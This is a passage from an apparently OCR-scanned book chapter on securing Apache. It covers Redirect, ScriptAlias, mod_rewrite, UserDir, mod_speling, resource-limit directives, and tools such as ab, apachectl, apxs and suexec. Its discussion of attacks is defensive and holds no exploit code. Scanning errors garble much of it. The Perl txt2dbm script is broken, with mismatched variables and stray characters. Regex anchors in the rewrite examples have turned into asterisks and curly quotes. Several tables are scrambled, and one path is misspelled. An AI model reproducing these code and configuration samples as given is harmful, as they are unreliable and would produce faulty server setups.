example, is not case sensitive while Apache is. Webmasters failing to observe this suffered 
attacks on Mac OS X. Also, carefully analyze your regex rules. Sometimes, a regex that looks 
okay is more sweeping than it initially seems. 
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Redirect 
Redirect maps old URLs to new ones. Apache returns a new URL to the client, 
which, in turn, tries it. 


The syntax is 


Redirect [status] URL-path URL 


Here, status indicates one of four states: 
e gone—HTTP_GONE (410) 
e permanent—HTTP_MOVED_ PERMANENTLY (301) 
e temp—HTTP_MOVED_ TEMPORARILY (302) 


e seeother—HTTP_SEE_OTHER (303) 


Otherwise, URL -path is the internal path (relative to DocumentRoot) and file-path 
reflects where you’d like to redirect the request. 


For example: 


Redirect /documents http://www. foo.com/docs 


This redirects requests of http://www. yourhost.com/documents to 
http: //www.foo.com/docs instead. 


RedirectMatch 


RedirectMatch is essentially Redirect with regular expression power. Apache applies 


the regex matching to URL-path and directory-path. 
The syntax is 


RedirectMatch [status] regex URL 


Here, status indicates one of four states: 
e gone—HTTP_GONE (410) 
e permanent—HTTP_MOVED_ PERMANENTLY (301) 
e temp—HTTP_MOVED_TEMPORARILY (302) 


e seeother—HTTP_SEE_OTHER (303) 


Otherwise, regex is the pattern and URL reflects where you’d like to redirect the 


request. For example, suppose you decided to establish a box strictly to serve images, 
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and furthermore, you standardized all image files to JPEG format (where they were 
previously GIF). You could quickly make the change as follows: 


RedirectMatch (.*)\.gif$ http://images.yourhost.com$1.jpg 


Here, images.yourhost.com’s DocumentRoot will handle any requests for GIF files on 
your local system. 


NOTE 


Take care when applying regular expressions. Test them exhaustively before applying them on 
a production server. One slip and you might inadvertently give attackers access to sensitive 
areas. 





ScriptAlias 
ScriptAlias is essentially Alias, but enables you to specify what target directory will 
contain CGI scripts that mod_cgi will process. 


The syntax is 

ScriptAlias URL-path file-path | directory-path 

Here, URL -path is the internal path (relative to DocumentRoot), and file-path and 
directory -path represent where you'd like to map such requests. 


For example, suppose you'd like to restrict CGI scripts to the directory /www/cgi-bin. 
You could articulate that like this: 


ScriptAlias /cgi-bin/ /www/cgi-bin/ 


This would map any requests to http://www. yourhost.com/cgi-bin to /ww/cgi-bin 
in your internal directory structure. 


NOTE 


Here’s some historical trivia: ScriptAlias once had a hole. Apache 0.8.11 and 0.8.14 
harbored a weakness that allowed remote attackers to view CGI source code in any directory 
following DocumentRoot that had, in the Apache configuration file, a ScriptAlias directive. 


ScriptAliasMatch 
ScriptAliasMatch is essentially ScriptAlias with regular expression power. Apache 
applies regex matching to URL-path and directory -path. 


The syntax is 


ScriptAliasMatch regex file-path | directory-path 


URL Mapping and Security 147 


Here, regex is the pattern, whereas file-path and directory-path denote locations. 
For example, suppose you wanted to alias all scripts called from /cgi-bin to 
/www/cgi-bin. You could articulate that like this: 


ScriptAliasMatch */cgi-bin(.*) /www/cgi-bin$1 


mod_rewrite 


mod_rewrite is the heart of Apache’s URL handling engine and as such, is capable of 
evaluating complicated regular expressions. As explained in Apache’s documenta- 
tion: 


This module uses a rule-based rewriting engine (based on a regular-expression parser) to 
rewrite requested URLs on the fly. It supports an unlimited number of rules and an unlimited 
number of attached rule conditions for each rule to provide a really flexible and powerful URL 
manipulation mechanism. The URL manipulations can depend on various tests, for instance 
server variables, environment variables, HTTP headers, time stamps, and even external data- 
base lookups in various formats can be used to achieve a really granular URL matching. This 
module operates on the full URLs (including the path-info part) both in per-server context 
(httpd.conf) and per-directory context (.htaccess) and can even generate query-string parts 
on result. The rewritten result can lead to internal sub-processing, external request redirection 


or even to an internal proxy throughput. 


You'll find mod_rewrite’s source in httpd-version/modules/mappers. 
You control mod_rewrite’s behavior with nine configuration directives: 

e RewriteEngine 

e RewriteOptions 

e RewriteLog 

e RewriteLogLevel 

e RewriteLock 

e RewriteMap 

e RewriteBase 

e RewriteCond 


e RewriteRule 
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RewriteEngine 
RewriteEngine is the most important configuration directive because its status deter- 
mines if Apache does rewriting at all. 


The syntax is 

RewriteEngine state 

Here, state is either on or off. As noted in Apache’s documentation, “...If it is set to 
off this module does no runtime processing at all. It does not even update the 


SCRIPT_URx environment variables.” Hence, if you want Apache to function, ensure 
that RewriteEngine is on. 


RewriteOptions 
RewriteOptions sets special options for the instant per-server or per-directory config- 
uration. Options at this point include 


e inherit—tThis forces the server’s configuration on all child directories. That is, 
Apache will enforce all rules specified in the top-level directory (for example, 
DocumentRoot) on subordinate directories. 


The syntax is 
RewriteOptions Option 


Here, at this point, anyway, Option can only be inherit. However, that might change 
in the future. 


RewriteLog 

Use RewriteLog to set the file to which Apache logs rewriting actions. If you don’t 
precede that name with a slash, Apache assumes that the location is relative to server 
root. 


The syntax is 

RewriteLog file-path 

Here, file-path is the rewrite log file’s location. For example, suppose you want to 
place that file in /var/log/rewrites/rwlog.log. You can articulate that as follows: 


RewriteLog "/var/log/rewrites/rwlog.log" 


NOTE 





Do not set the rewrite log to /dev/null. Also, ensure that only the user who starts httpd can 
write the log. 
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RewriteLogLevel 
Use RewriteLogLevel to set the verbosity level with which mod_rewrite writes logs 
into the rewriting log file. 


The syntax is 
RewriteLogLevel level 


Here, level is a numeric value from 0 to 9. 0 instructs Apache not to log at all, 
whereas level 9 forces it to log everything. 


RewriteLock 

Use RewriteLock to specify mod_rewrite’s synchronization lock file. This file is essen- 
tial to mod_rewrite’s operation. Therefore, ensure that you locate this file on a local 
drive (and not an NFS volume). Otherwise, if your NFS dies, so does your rewriting 
engine. 


The syntax is 

RewriteLock file-path 

Here, file-path is the location for mod_rewrite’s lock file. 

RewriteMap 

Use RewriteMap to specify a custom rewrite rule file. 

The syntax is 

RewriteMap MapName MapType:MapSource 

Here, MapName is a string by which you'll refer to the map, MapType is the map’s data 
format (see the following), and MapSource is the map’s fully articulated path. 
MapType can be 


e Standard plain text—This points to a file that contains value/new-value pairs, 
one per line, in plain text. 


e Randomized plain text—This points to a file that contains multiple value/new- 
value pairs, separated by pipes, with all possible alternatives appearing in a 
single string, on a single line, in plain text (dogs|canines|mutts). Apache will 
randomly pick one and rewrite the original terms with that. 


e Hash file—This signifies a binary NDBM (the “New DBM” format) file contain- 
ing the same contents as a plain text format file, but with quicker lookups. This 
is a database file format that handles key/data pairs quickly. See the following 
for an Apache-recommended Perl script for packaging such files. 
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e Internal function—This signifies some internal Apache function, such as 
toupper, tolower, escape, or unescape. 


e External program—this is a program or script written for rewriting purposes. 


WARNING 


Take extreme care when relying on an external program because this could open many secu- 
rity holes, including DoS (your custom program eats too many system resources), failed 
matching or lexical mistakes (your matching logic is somehow screwy), and even shell expo- 
sure (you somehow wrote the program in such a way that attackers can break out of it). 





Apache’s team recommends the following script for generating NDBM files from 
plain text: 


#!/bin/perl 

## 

## = txt2dbm -- convert txt map to dbm format 
## 


use NDBM_File; 
use Fentl; 


($txtmap, $dommap) = @ARGV; 

open(TXT, "<$txtmap") or die "Couldn't open $txtmap!\n"; 

tie (%DB, 'NDBM_File', $dbmmap,0 RDWR|O TRUNC|O_CREAT, 0644) 
wor die "Couldn't create $dbmmap!\n"; 

while (<TXT>) { 


next if (/*\s*#/ or /*\s*$/); 
$DB{$1} = $2 if (/*\s*(\S+)\s+(\St)/); 


untie %DB; 
close(TXT); 


$ txt2dbm map.txt map.db 
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RewriteBase 
Use RewriteBase to set the base URL for per-directory rewrites. This is a tricky direc- 
tive, and requires that you take into account any Alias directives you previously set. 


The syntax is 


RewriteBase URL-path 


Here, URL-path is the path to which Apache should map the request. However, note 
that this path can be an aliased path, too. For example, suppose that you earlier 
made this declaration: 


Alias /www /www/docs 


This maps requests going to http://www. yourhost.com/www/ to the internal directory 
/www/docs. Given those circumstances, consider implications of this RewriteBase 
instruction: 


RewriteBase  /www 
RewriteRule *original\.html$ remapped.html 


Because your RewriteBase references an alias (and not a directory relative to 
DocumentRoot), remapped.htm1 will end up in /www/docs. This can get confusing, 
especially when you nest multiple RewriteBase instructions on a per-directory basis 
where you earlier specify aliases. Carefully consider your rules when using 
RewriteBase. 


RewriteCond 

RewriteCond is a powerful directive that lets you specify conditional rewriting. 
Suppose that on your site, you create different index pages for different browsers, as 
follows: 


e The index page for MSIE uses Active X. 
e The index page for Netscape uses Java. 


e The index page for Lynx uses neither. 


Now, what you’d like to do is have Apache automatically rewrite the request depend- 
ing on what client your visitors use. To do so, you establish Apache’s behavior in two 
phases: 


e Condition—If this happens... 
e Rule—Do this 
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Let’s stick with the previous example. Here’s how you’d do it: 


RewriteCond %{HTTP_USER_AGENT} “MSIE. * 


RewriteRule ^/$ 


/index.activex.html [L] 


RewriteCond %{HTTP_USER_AGENT} “*Mozilla.* 


RewriteRule ^/$ 


/index.java.html [L] 





RewriteCond %{HTTP_USER_AGENT} “Lynx.* 





RewriteRule ^/$ 


NOTE 


/index.barebones.html [L] 


The [L] notation indicates “Last” or “Last Rule.” See the following RewriteRule. 





Table 8.4 lists environment variables on which you can trigger RewriteCond. 


TABLE 8.4 Valid RewriteCond Environment Variable Triggers 


Variable 


Value 





API_VERSION 
AUTH_TYPE 
DOCUMENT_ROOT 
HTTP_ACCEPT 
HTTP_COOKIE 
HTTP_FORWARDED 
HTTP_HOST 
HTTP_PROXY_CONNECTION 
HTTP_REFERER 
HTTP_USER_AGENT 
IS_SUBREQ 
PATH_INFO 
QUERY_STRING 
REMOTE_ADDR 
REMOTE_HOST 
REMOTE_IDENT 
REMOTE_USER 
REQUEST_FILENAME 
REQUEST_METHOD 
REQUEST_URI 
SCRIPT_FILENAME 
SERVER_ADDR 
SERVER_ADMIN 


Stores the Apache module API version 
Stores the authentication method used 
Stores DocumentRoot 

Stores the types the client will accept 
Stores the cookie sent by the remote client 
Stores a proxy connection’s origin 

Stores the server’s name 

Stores the HTTP Proxy-Connection header 
Stores the referring document's URL 
Stores the client software identification 
Stores status of whether this is a subrequest 
Stores any extra path info sent 

Stores the client’s raw query string 

Stores the client’s IP address 

Stores the client’s host name 

Stores the remote username (if available) 
Stores the username for authentication 
Stores the requested resource’s local path 
Stores the client’s HTTP request method 
Stores the HTTP requested URI 

Stores the requested resource’s local path 
Stores the server's DNS address 

Stores the administrator’s e-mail address 


TABLE 8.4 Continued 
Variable 
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Value 





SERVER_NAME 
SERVER_PORT 
SERVER_PROTOCOL 
SERVER_SOFTWARE 
THE_REQUEST 
TIME 

TIME_DAY 
TIME_HOUR 
TIME_MIN 
TIME_MON 
TIME_SEC 
TIME_WDAY 
TIME_YEAR 





Stores the server’s hostname 

Stores the port on which httpd is running 
Stores the server's protocol and version 
Stores httpd’s make and version 

Stores the client’s full HTTP request line 
Stores the time in a formatted string 
Stores the current date 

Stores the current hour (0-23) 

Stores the current minute (0-59) 
Stores the current month (0-11) 

Stores the current second (0-59) 
Stores the current weekday (0-6) 
Stores the current year (XXXX) 





To lessen dangers that you might potentially face in formulating a custom regular 
expression on the previous variables (and other values), Apache included some 
preformatted regex tests, which Table 8.5 lists. 


TABLE 8.5 Prefabricated Regex Tests for RewriteCond 





Test What It Does 

'1-d' Is not a directory 

'1-f' Is not a regular file 

'1-F' Is not an existing file via subrequest 

'1-1' Is not a symbolic link 

'l-s' Is not a regular file greater than 0 bytes 

'1-U' Is not an existing URL via file subrequest 

'<RegEx' TestString RegEx is lexically less than TestString or true when this is true 
'=RegEx' TestString RegEx is lexically equal to TestString or true when this is true 
'>RegEx' TestString RegEx is lexically greater than TestString or true when this is true 
'-d' Is a directory 

'f' Is a regular file 

.F! Is an existing file via subrequest 

‘sl! Is a symbolic link 

'-s' Is a regular file greater than O bytes 

'-U' Is an existing URL via file subrequest 





Additionally, RewriteCond supports several flags that enhance your ability to inci- 
sively and conditionally trigger Apache behavior. Table 8.6 describes them. 
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TABLE 8.6 RewriteCond Flags 








Test What It Does 
‘nocase|NC' Do not use case sensitivity 
‘ornext|OR' Or next condition 
RewriteRule 


RewriteRule is the most powerful of the mapping modules—especially matched with 
RewriteCond. RewriteRule will map any regular expression to a substitution as many 
times and against as many RewriteCond rules as you want. 


Table 8.7 lists a few regular expression tests RewriteRule supports and what they do. 


TABLE 8.7 RewriteRule Regular Expressions 


Metacharacters Function 





Match any one character 
[oak] Match any character in brackets 








[Ante] Match any character but those in brackets 

Quantifiers Function 

? Match any character zero or one times 

x Match the preceding element zero or more times 

+ Match the preceding element one or more times 

{num} Match the preceding element num times 

{min, max} Match the preceding element at least min times, but not more than max 
times 

Anchors Function 

5 Match at the start of the line 

$ Match at the end of the line 

\< Match at the beginning of a word 

\> Match at the end of a word 

\b Match at the beginning or the end of a word 

\B Match any character not at the beginning or end of a word 

Others Function 





| A logical OR (to alternate) 
\ To escape characters, precede them with this 





RewriteRule adds even more power than you can realize from regular expressions by 
accepting several important flags. Table 8.8 lists these and their functions. 


TABLE 8.8 RewriteRule 


Option or Flag 
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Options and Flags 


What It Does 





‘chain | C' 


‘forbidden | F' 


‘gone | G' 
‘last | L' 
‘next | N' 


'nocase | NC' 
"proxy | P' 


‘qsappend | QSA' 


‘redirect | R [=code]' 


This is an interesting flag; it lets you compound your rules by 
chaining them. You can chain one or several (and the chain 
begins with the current rule which, in turn, gets appended to 
the next). 

This forces a FORBIDDEN return (403). Hence, you could use 
this in conjunction with RewriteCond and RewriteRule to inci- 
sively ascertain a client's address and deny them access to a 
specific document or URI. 

Force a document or URI to be HTTP_GONE. 

Use this flag to signal that the preceding rule was the last or 
final rule. 

This is the equivalent of the next or continue statements in Perl 
and C, respectively. This causes RewriteRule to evaluate and 
rewrite the URL that resulted from the previous rule. 

This tells Apache not to handle the pattern as case sensitive. 
Forces the client request to an internal proxy request and thus 
sends it through mod_proxy 

This forcibly appends query string components into already 
existing requests. 

Use this to force an external redirection (and precede the 
substitution by a fully qualified base URL, including protocol, 
hostname, and port). 





mod_userdir 


mod_userdir handles mapping of user directories. It supports one directive only: 
UserDir. UserDir directly manages user directories. 


The syntax is 


UserDir directory - filename 


Here, directory - filename is 


e A directory 


e disabled—This kills all user directory mapping that you haven’t explicitly 


declared elsewhere. 
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e disabled [user-list]—The disabled keyword takes a space-delimited user list 
as an argument. Any users appearing here are locked out, meaning Apache 
won’t map their directory, and hence their Web pages will not be visible from 
the outside. 


e enabled [user-list]—The enabled keyword takes a space-delimited user list 
as an argument, and users that appear here will enjoy directory translation. 


Apache treats other arguments (that aren’t disabled or enabled) as filename 
patterns. 


UserDir is a quick, painless way to map user directory data to the main 
DocumentRoot—or even virtual hosts. For example, if you make this assignment: 


UserDir public_html 


Now, suppose that you have a user named Alaric whose home directory is 
/home/Alaric, and whose Web directory is /home/Alaric/public_html. Alaric wants 
to house ww.alaric-home.com on your server. Naturally, you don’t want Alaric’s 
HTML in the server’s root directory, so you map his virtual host like this: 


<VirtualHost 1.23.456.789> 
ServerAdmin Alaric@.alaric-home.com 
DocumentRoot /home/Alaric/public_html 
ServerName www.alaric-home.com 
ErrorLog logs/alaric-home.com-error_log 
CustomLog logs/alaric-home.com-access_log common 
</VirtualHost> 


Apache would then serve an outside request for http: //www.Alaric - 
home.com/index.html from /home/Alaric/public_html/index.html. 


Note that public_html has long been a standard place for user HTML, and crackers 
are well aware of this. Consider designating some other directory. If you don’t, 
attackers could gather intelligence on your server. 


Such a case emerged in September 2001 on Red Hat Linux 7.0. Attackers could use 
Web clients to ascertain valid usernames by trying http://www. foo.com/~username. 
Apache would throw different status codes depending on what it found: 200, 403, 
and 404, respectively. 


For example, if a user existed and had a homepage, Apache returned the home page. 
However, if a user existed but had no home page, Apache reported an access permis- 
sion error. Finally, if no such user existed, Apache reported that it couldn’t find the 
specified index. 
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Through this mechanism, attackers could differentiate valid usernames from invalid 
ones. They didn’t have to do it one at a time, either, or even three at a time. URL- 
grabbing tools like curl (available at http: //curl.haxx.se/) could automate such 
discovery. 


mod_speling 

It seems fitting that the developers named this module mod_speling instead of 
mod_spelling. Notwithstanding its ironic name, mod_speling does precisely what 
you’d expect: It auto-corrects URL spelling mistakes—to a degree. 


mod_speling ignores capitalization and supports corrections, but only of one mistake 
per transmission, naturally, because it adheres to the request_rec scheme and is part 
of a system that works on a request-response basis. 


NOTE 


You'll find mod_speling’s source in httpd-version/modules/mappers. 





mod_speling is the last resort module in that it makes last-ditch efforts to derive a 
valid URL from the client’s request. To do that, it examines the string and tries one 
correction (providing you enabled the spell-check function). 


mod_speling supports only one directive: CheckSpelling. 
The syntax is 


CheckSpelling state 


Here, state is either on or off. 


Note that the spelling test is for files or directories only and not for usernames. 
Moreover, carefully consider enabling this feature because attackers can eat consider- 
able memory by sending successive URIs that contain lexically complicated directory 
and filenames. This feature is most useful in intranet environments (where you 
know the identities of your users and an attack is unlikely). 


Resource Usage 


Another issue you'll face is resource utilization, or controlling just how much band- 
width clients can eat and how many bytes they can send in any given request. These 
issues don’t initially seem terribly important. However, if you neglect to address 
them, your host might come under sustained denial-of-service attacks. 
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Directives that restrict or minimize such activity include 


AcceptMutex 
LimitRequestBody 
LimitRequestFields 
LimitRequestFieldsize 
LimitRequestLine 
RLimitCPU 

RLimitMEM 

RLimitNPROC 


ThreadStackSize 


AcceptMutex 


AcceptMutex lets you specify how Apache will handle serialization of multiple child 
processes. You can now set this at runtime and, except on IRIX (which has an addi- 
tional method), you have four choices: 


USE_FLOCK_SERIALIZED_ACCEPT—The flock method uses flock(2) to lock the 
lock file you specify with LockFile. 


USE_FCNTL_SERIALIZED_ACCEPT—The fcnt1 method uses fcnt1(2) to lock the 
lock file you specify with LockFile. 


USE_SYSVSEM_SERIALIZED_ACCEPT—The sysvsem method uses SysV semaphores 
to implement the mutex. Apache’s development team does not recommend 
this because it invites DoS attacks. 


USE_PTHREAD_SERIALIZED_ACCEPT—The pthread method uses POSIX mutexes 
but works flawlessly only under Solaris 2.5+. The Apache development team 
warns that in some configurations, this could hang Apache (unless you’re 
server is exclusively static content). 


I favor the flock method. It’s simple and unlikely to invite problems. It establishes 
the lock file (the traditional place for it being /var/lock/httpd.1lock) and that’s that. 


Resource Usage 


WARNING 


Do not attempt to establish a lock file (with LockFile) on any NFS or otherwise exported or 
imported volume. The lock file must be local. To understand why, consider this scenario: 
Suppose you established a lock file on a shared, exported, or imported volume. What happens 
if, in the middle of a transaction, that volume goes down (failed connectivity, protocol error, 
whatever)? Answer: The system will never release or even reach the lock file. 





LimitRequestBody 


The LimitRequestBody directive lets you limit the client’s request body to a specific 
size. This functionality is only available in versions 1.3.2 and later. 


The syntax is 


LimitRequestBody value 


value is a numeric value that you specify. It could be 0, which represents an unlim- 
ited request body size, all the way up to 2 gigabytes, although few request bodies 
would approach 2 gigs. 


Certain denial-of-service attacks and other malicious actions often require attackers 
to send impossibly long strings in their URI requests. LimitRequestBody offers you a 
mechanism to prevent such attacks. 


LimitRequestFields 


The LimitRequestFields directive, included in Apache’s core system, enables you to 
limit the number of request fields a client can send in its request. This functionality 
is only available in versions 1.3.2 and later. 


The syntax is 


LimitRequestBody value 


value is a numeric value that you specify. It could be 0, which represents an unlim- 
ited request body size, all the way up to 32767. Certain denial-of-service attacks (and 
other malicious actions) often require attackers to send overwhelming request 
headers in their requests. LimitRequestFields offers you a mechanism to prevent 
such attacks by controlling the number of request fields. 
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LimitRequestFieldsize 


The LimitRequestFieldsize directive, included in Apache’s core system, enables you 
to limit the client’s request field size. This functionality is only available in versions 
1.3.2 and later. 


The syntax is 


LimitRequestFieldsize value 


value is a numeric value that you specify. It could be 0, which represents an unlim- 
ited request field size, all the way up to 8190 bytes. Certain denial-of-service attacks 
and other malicious actions require attackers to send impossibly long strings in their 
URI fields. LimitRequestFieldsize offers you a mechanism to prevent such attacks. 


LimitRequestLine 


The LimitRequestLine directive, included in Apache’s core system, enables you to 
limit the client’s request line size to a value less than the compiled-in default (8190). 
This functionality is only available in versions 1.3.2 and later. 


The syntax is 

LimitRequestLine value 

value is a numeric value that you specify. It could be 0, which represents an unlim- 
ited request field size, all the way up to 8189 bytes. Certain denial-of-service attacks 


and other malicious actions require attackers to send impossibly long strings in their 
request lines. LimitRequestLine offers you a mechanism to prevent such attacks. 


RLimitCPU 


RLimitCPU enables you to limit the CPU resources that processes forked from Apache 
child processes can eat. 


The syntax is 
RLimitCPU number | max [number | max] 


The first set (number max) signifies the soft limit you’re allowing; the second signifies 
the absolute limit. When expressing these values, do so in seconds per process. 


RLimitMEM 


RLimitMEM enables you to specify the memory resources that processes forked from 
Apache child processes can eat. 
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The syntax is 
RLimitMEM number | max [number | max] 


The first set (number max) signifies the soft limit you’re allowing; the second signifies 
the absolute limit. When expressing these values, do so in bytes per process. 


RLimitNPROC 
RLimitNPROC enables you to limit the number of processes for a user or UID. 


The syntax is 


RLimitNPROC resource-limit 


Here, resource-limit is the maximum number of processes. 


ThreadStackSize 


ThreadStackSize sets what stack size Apache should use for each running thread. 
Take care in what values you assign here, because a value too small will invite stack 
errors. 


The syntax is 


ThreadStackSize number 


Here, number represents the size. The default is 65536. 


Apache Server Tools 


Apache ships with several server tools that help you more efficiently manage Apache 
and its functions. They are 


e ab 
e apachectl 
e apxs 


e suexec 


ab (The Apache HTTP Server Benchmarking Tool) 


ab, the HTTP server benchmarking tool, will track your Apache server's performance 
by ascertaining how many requests per second your Apache installation can survive. 
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A simple test: 


$ ab -n 100 http://www.hiddenhost-sams.com:80/ 


Server Software: 
Server Hostname: 
Server Port: 


Document Path: 
Document Length: 


Concurrency Level: 
Time taken for tests: 
Complete requests: 
Failed requests: 
Total transferred: 
HTML transferred: 
Requests per second: 
Transfer rate: 


Connnection Times (ms) 


min avg 
Connect: 1) 1) 
Processing: Q Q 
Total: 1) 1) 


As noted, ab performed a small test of 100 successive requests over 0.121 seconds. 
Based on this sparse information, it found that my system could handle 826.45 
requests per second. That’s not accurate, though: It would likely fold before it 
reached that amount, especially if the requests were concurrent. Let’s try it: 


$ ab -c 100 -n 1000 http://www.hiddenhost-sams.com:80/ 


Server Software: 
Server Hostname: 
Server Port: 


Document Path: 
Document Length: 


Concurrency Level: 
Time taken for tests: 
Complete requests: 
Failed requests: 


Apache/1.3.12 
www. hiddenhost-sams.com 
80 


/ 
68 bytes 


@.121 seconds 

100 

0 

34200 bytes 

6800 bytes 

826.45 

282.64 kb/s received 


max 
0 
12 
12 


Apache/1.3.12 
www. hiddenhost-sams.com 
80 


/ 
68 bytes 


100 

3.155 seconds 
1000 

0 


Total transferred: 
HTML transferred: 


Requests per second: 


Transfer rate: 


Connnection Times (ms) 


min 
Connect: 0 
Processing: 19 
Total: 19 


avg 

1 
284 
285 
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342000 bytes 

68000 bytes 

316.96 

108.40 kb/s received 


max 

12 
928 
940 


Things now look a tad different. In the previous test, I asked for 1000 connections 
with a concurrency setting of 100. Suddenly, performance went way down (from 
826.45 per second to 316.96 per second). You can try different scenarios: tweaking 
and alternating number of requests, concurrency, authentication, time limits, and so 
forth. Mix and match these to simulate real-life conditions (the result might surprise 
you). Table 8.9 describes ab options. 


TABLE 8.9 ab Options and Arguments 


Option or Argument 


Significance 





-A [username :password] 


-c [concurrency] 


-C [name=value] 





-h 

-i 

-k 

-n [num] 

-p [header] 

-p [post-file] 

-p [username :password] 
-T [content-type] 
-t [time-limit] 
-v [1|2|3|4] 

-V 


Pass basic authentication credentials during ab’s test. 

The number of concurrent requests ab should perform. By default, 
ab doesn’t do concurrent connections but instead, successive ones. 
Append a cookie line to each request during the text, with 
name/value pairs for variables. 

Display quick help. 

Use a HEAD instead of a GET method. Note: you cannot mix this 
with a POST HTTP request. 

Enable the capability to perform multiple requests within one HTTP 
session. Default is not to enable this feature. 

Here, num represents the number of requests ab should perform. 
Append custom headers to each request during the test. 

A file that contains POST data for ab to send during tests. 

Pass proxy credentials during the test. 

The content-type header ab should use for POST data. 

The number of seconds to perform the specified test. (Default is 
none, which means that ab will continue until the job is done. 
Sets the verbosity level. Level 4 prints header information, level 3 
prints response codes, level 2 prints warnings and informational 
messages. Level 1 is nominal. 

Display version information. 
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TABLE 8.9 Continued 








Option or Argument Significance 

-w Format output in tabled HTML. 

x [attributes] A string to use as attributes for <table>. 
-y [attributes] A string to use as attributes for <tr>. 

z [attributes] A string to use as attributes for <td>. 
apachectl 


apachectl is the Apache HTTP server control interface. apachect1 is essentially a 
quick-access front end to httpd. Using apachect1 you can start, stop, or obtain 
httpd’s status. Table 8.10 lists apachect1’s options. 


TABLE 8.10 apachect1 Options 








Option or Argument Significance 

configtest This will test your configuration file (nttpd.conf) syntax for errors. 

fullstatus Displays a verbose status report pulled from mod_status, a requisite 
for this to work. 

graceful Gracefully restarts httpd via a SIGUSR1. 

help Displays help. 

restart Restarts httpd by sending a SIGHUP. If httpd isn’t running, this 
starts it. 

start Start httpd. 

status Displays a brief status report. 

stop Stops httpd. 

apxs 


apxs, the Apache Extension Tool, is a tool for building and installing extension 
modules for httpd via a Dynamic Shared Object (DSO) from object files which you 
can subsequently load via LoadModule. 


apxs is a Perl script, located (usually) in /usr/sbin. A brief tour of it reveals that it 
goes through eight phases: 


e Configuration—Sets all variables to be used 
e Argument handling—Parses the argument line 
e Initial DSO support check 


e Query Information—Gets the Makefile flags 
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e DSO Compilation—Splits files into source and object files 
e Output File Choice—Determines and sets the outfile 
e Compiling and linking 


e DSO Installation 


In all, apxs is very useful, but to use it, you must have mod.so support. To find out, 
issue the httpd command plus the -l option, which triggers a list of compiled-in 
modules. 


For example: 


[root@samshacker]# /usr/sbin/httpd -1 
Compiled-in modules: 

http_core.c 

mod_so.c 


Table 8.11 lists apxs’s options and arguments. 


TABLE 8.11 apxs Options and Arguments 





Option or Argument Significance 
-n [name] Use this to specify the module’s name. 
-q [flags] Use this to query apxs about what it knows. Here, apxs reports the 


flags it has knowledge of right now. Valid flags can be CC, CFLAGS, 
FLAGS_SHLIB, INCLUDEDIR, LD_SHLIB, LDFLAGS_SHLIB, LIBEXECDIR, 
LIBS _SHLIB, PREFIX, SBINDIR, SYSCONFDIR, and TARGET. 


-S [variable] Use this to set flags. Valid flags are CC, CFLAGS, FLAGS_SHLIB, 
INCLUDEDIR, LD_SHLIB, LDFLAGS_SHLIB, LIBEXECDIR, LIBS_SHLIB, 
PREFIX, SBINDIR, SYSCONFDIR, and TARGET. 

-g [directory] This option generates sample, template files and a makefile in a 
named subdirectory. 

-C This is a DSO compilation option. It compiles the C source files into 
object files and builds a DSO in dsofile by linking the object files. If 
you don’t specify an outfile, it guesses (by pulling the first file's name 
and fusing it, for example, mod_name. so). 

-o [dsofile] Use this to specify the outfile. 

-D var[=val] Use this to send additional defines through to compilation. 

-I [inel-dir] Use this to pass additional include directories to the compilation 
process. 

-L [lib-dir] Use this to pass additional libraries to the compilation process. 

-We, [compiler-flags] Use this to pass additional compiler flags. 


-W1, [linker -flags] Use this to pass linker-flags to the linker command. 
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TABLE 8.11 Continued 





Option or Argument Significance 

-i This instructs apxs to install the DSOs into the server’s 1ibexec direc- 
tory. 

-a This automatically inserts a LoadModule to httpd.conf, thus making 


the instant module load automatically on Apache's next startup. 

-A This adds a LoadModule reference to http.conf, but comments it out. 
This is the editing option, which you can use with -a and -A to edit 
httpd.conf. 





SUEXEC 


suexec or Switch User For Exec solved a serious security issue by allowing you to run 
CGI scripts as a specified user and group. This eliminated many CGI and SSI security 
holes, because in using it, you could more incisively control script or shelled- 
command permissions. 


suexec proper (the program) emerged in Apache 1.2 as a wrapper that stood between 
Apache serving a dynamic URI, and the script that would generate that URI’s 
dynamic output. 


When suexec received such a query, it initiated several tests: 
e Did Apache send the appropriate arguments? If not, suexec would refuse. 


e Was the user who called the script valid, and if so, was it allowed to execute it? 
If not, suexec would refuse. 


e Were the target user’s username and group valid, and were these not root? If 
not, suexec would refuse. 


e Did the target directory exist? If not, suexec would refuse. 

e Was it under DocumentRoot? If not, suexec would refuse. 

e Was it nonwritable? If not, suexec would refuse. 

e Was the target setuid or setgid? If so, suexec would refuse. 

e Did the user own the target file? If not, suexec would refuse. 


e Could suexec launch the target script? If not, suexec would refuse. 


By these mechanisms, suexec would check whether a CGI or SSI was safe, especially 
from a permission standpoint. 
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NOTE 


Curious side note: Sometimes, though rarely, security utilities suffer from the same ills they 
purport to cure. That was the case with suexec in Linux Mandrake 7.1. Apache for 7.1 had 
bad permissions on the suexec wrapper, leading to unintended results. 


Table 8.12 lists suexec command-line options. 


TABLE 8.12 suexec Options and Arguments 





Option or Argument Significance 

--enable-suexec Enables suexec feature, and demands at least one other option. 

- -suexec-caller=[UID] Use this to specify the username under which Apache normally 
runs (this is the user authorized to use suexec). 

- -Suexec -docroot=[DIR] Use this to set DocumentRoot. 

- -suexec-gidmin=[GID] Use this to specify lowest GID allowed to be an suexec target user. 

-- suexec-logfile=[FILE] Use this to specify the log file (this file will contain suexec usage 
logs). 

--suexec -safepath=[PATH] Use this to set safe PATH environment to pass to CGI executables. 

- -suexec -uidmin=[UID] Use this to specify lowest UID allowed to be a suexec target user. 

- -suexec -userdir=[DIR] Use this to specify the subdirectory under users’ home directories 


where you allow suexec to operate. 





Today, suexec functionality is embedded in a module called mod_suexec. mod_suexec 
runs CGI scripts as a specified user and group. 


The syntax is 

SuexecUserGroup user group 

user is the username you specify, and this must be a valid user. group is the group 
you specify. 


Note that enabling suexec could initially break many scripts on your server. 
Certainly, all scripts that do not conform to suexec’s set permission scheme will fail 
(Apache will return a 500 error code on these scripts, complaining of script headers 
ending prematurely). 


To bypass this issue, ensure that 


e Apache must call scripts in user directories (/~username) by their proper names 
(if you mapped a virtual domain to a user directory, Apache must call that 
script from the user directory and not with a virtual domain base URL). 


e For Apache to call and suexec to process such scripts, scripts must carry the 
same permissions you specified. If they don’t, suexec will stop. 
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e You must establish designated CGI directories for virtual domains on a host-by- 
host basis. That is, you cannot declare a blanket cgi-bin directory via ScriptAlias 
and leave it at that. Here’s why: suexec relies on user and group values. 

Because each virtual domain’s directory will have different user and group 
values, you'll need to make provisions for suexec execution for each such 
directory. 


You control mod_suexec using the SuexecUserGroup directive, as demonstrated previ- 
ously. 


Summary 


